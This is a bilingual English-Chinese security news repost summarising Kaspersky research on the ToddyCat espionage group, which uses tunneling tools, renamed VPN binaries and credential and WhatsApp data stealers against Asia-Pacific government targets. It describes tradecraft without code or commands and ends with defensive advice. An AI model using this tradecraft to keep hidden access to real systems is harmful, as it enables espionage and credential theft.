工业级数据窃取：ToddyCat黑客组织的高级工具

The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data.

已经观察到被称为ToddyCat的威胁行为者使用各种工具保持对被入侵环境的访问，并窃取有价值的数据。

Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in the Asia-Pacific region.

俄罗斯网络安全公司卡巴斯基将这个对手描述为依赖各种程序以"工业规模"从主要位于亚太地区的政府组织（其中一些与国防有关）收集数据。

"To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack," security researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova said.

"为了从许多主机收集大量数据，攻击者需要尽可能自动化数据收集过程，并提供几种替代方式来持续访问和监视他们攻击的系统，" 安全研究人员Andrey Gunkin、Alexander Fedotov和Natalya Shornikova表示。

ToddyCat was first documented by the company in June 2022 in connection with a series of cyber attacks aimed at government and military entities in Europe and Asia since at least December 2020. These intrusions leveraged a passive backdoor dubbed Samurai that allows for remote access to the compromised host.

ToddyCat在2022年6月首次被该公司记录，与至少自2020年12月以来针对欧洲和亚洲政府和军事实体的一系列网络攻击相关。这些入侵利用了被动后门Samurai，允许远程访问被入侵主机。

A closer examination of the threat actor's tradecraft has since uncovered additional data exfiltration tools like LoFiSe and Pcexter to gather data and upload archive files to Microsoft OneDrive.

对威胁行为者的技艺进行了更深入的审查，发现了额外的数据外泄工具，如LoFiSe和Pcexter，以收集数据并将归档文件上传到Microsoft OneDrive。

The latest set of programs entail a mix of tunneling data gathering software, which are put to use after the attacker has already obtained access to privileged user accounts in the infected system. This includes -

最新的一组程序包括一系列隧道数据收集软件，这些软件在攻击者已经获得被感染系统特权用户帐户访问权限后使用。这包括 -

• Reverse SSH tunnel using OpenSSH

• SoftEther VPN, which is renamed to seemingly innocuous files like "boot.exe," "mstime.exe," "netscan.exe," and "kaspersky.exe"

• Ngrok and Krong to encrypt and redirect command-and-control (C2) traffic to a certain port on the target system

• FRP client, an open-source Golang-based fast reverse proxy

• Cuthead, a .NET compiled executable to search for documents matching a specific extension or a filename, or the date when they are modified

• WAExp, a .NET program to capture data associated with the WhatsApp web app and save it as an archive, and

• TomBerBil to extract cookies and credentials from web browsers like Google Chrome and Microsoft Edge

Maintaining multiple simultaneous connections from the infected endpoints to actor-controlled infrastructure using different tools is seen as a fallback mechanism and a way to retain access in cases where one of the tunnels is discovered and taken down.

从被感染的端点到演员控制的基础设施保持多个同时连接被视为后备机制，也是一种在一个隧道被发现并关闭时保持访问权限的方法。

"The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system," Kaspersky said.

"攻击者正在积极使用技术来绕过防御，试图掩盖他们在系统中的存在，" 卡巴斯基表示。

"To protect the organization's infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information."

"为了保护组织的基础设施，我们建议将提供流量隧道的云服务的资源和IP地址添加到防火墙拒绝列表中。此外，用户必须要求避免在其浏览器中存储密码，因为这有助于攻击者访问敏感信息。

参考资料

[1]https://thehackernews.com/2024/04/russian-hacker-group-toddycat-uses.html

关注我们

        欢迎来到我们的公众号！我们专注于全球网络安全和精选双语资讯，为您带来最新的资讯和深入的分析。在这里，您可以了解世界各地的网络安全事件，同时通过我们的双语新闻，获取更多的行业知识。感谢您选择关注我们，我们将继续努力，为您带来有价值的内容。

原文始发于微信公众号（知机安全）：工业级数据窃取：ToddyCat黑客组织的高级工具